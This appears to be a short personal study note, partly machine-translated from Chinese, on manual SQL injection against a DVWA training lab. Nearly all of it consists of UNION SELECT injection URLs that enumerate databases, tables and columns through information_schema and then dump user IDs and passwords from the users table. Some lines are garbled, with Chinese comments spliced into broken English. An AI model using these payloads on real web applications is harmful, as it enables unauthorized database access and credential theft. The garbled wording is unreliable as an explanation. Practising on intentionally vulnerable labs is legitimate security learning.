Substring_index (USER (), "@", L)-- #是将查询出来的结果进行切分, slice ' union select Table_name,table_schema from information in the way of the @ symbol _schema.tables--+ #查询数据库中所有的库表
Query all databases, data sheet: http://192.168.100.129/dvwa/vulnerabilities/sqli/?id= ' +union+select+table_name,table_schema+from+ information_schema.tables--+ ' &submit=submit#
Count the number of tables in each database: Http://192.168.100.129/dvwa/vulnerabilities/sqli/?id= ' +union+select+table_schema,count (*) +from+ Information_schema.tables GROUP by table_schema--+ ' &submit=submit#
Query the corresponding table in each library: http://192.168.100.129/dvwa/vulnerabilities/sqli/?id= ' +union+select+table_name,table_schema from+ Information_schema.tables where table_schema= ' Dvwa '--+ ' &submit=submit#
Query all columns in the user table: http://192.168.100.129/dvwa/vulnerabilities/sqli/?id= ' +union+select+table_name,column_name from+ Information_schema.columns where table_schema= ' Dvwa ' and table_name= ' users '--+ ' &submit=submit#
Querying users and passwords in the user table: Http://192.168.100.129/dvwa/vulnerabilities/sqli/?id= ' +union+select+user_id,password from Dvwa.users--+ ' &submit=submit#
Manual vulnerability Mining-sql Injection (Security cow notes)